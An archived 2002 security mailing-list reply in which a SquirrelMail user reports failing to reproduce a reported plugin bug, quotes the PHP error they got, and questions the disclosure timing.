Re: squirrelmail bug

From: Adam Herscher (adamat_private)
Date: Thu Jan 24 2002 - 13:31:26 PST

    I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9:

    Fatal error: Call to undefined function: sqspell_getlang() in
    /usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php
    on line 59

    I'm also curious how much notice this person gave to the Squirrelmail
    development team to prepare a fix before releasing it to the world.. (same
    thought applies to the random cross-scripting vulnerability just sent out
    3 seconds ago)

    On anothre note Squirrelmail 1.2.3 was released 01/21/02.. I was wondering
    if anyone has had the opportunity to test against it.  This specific issue
    doesn't seem to have been noted in the changelog:

    http://www.squirrelmail.org/changelog.php

    Attempted to contact off-list earlier, but it seems the sender's mx is
    having problems.

    <appelastat_private>:
    213.134.128.227 does not like recipient.
    Remote host said: 550 5.7.1 <appelastat_private>... Relaying denied
    Giving up on 213.134.128.227.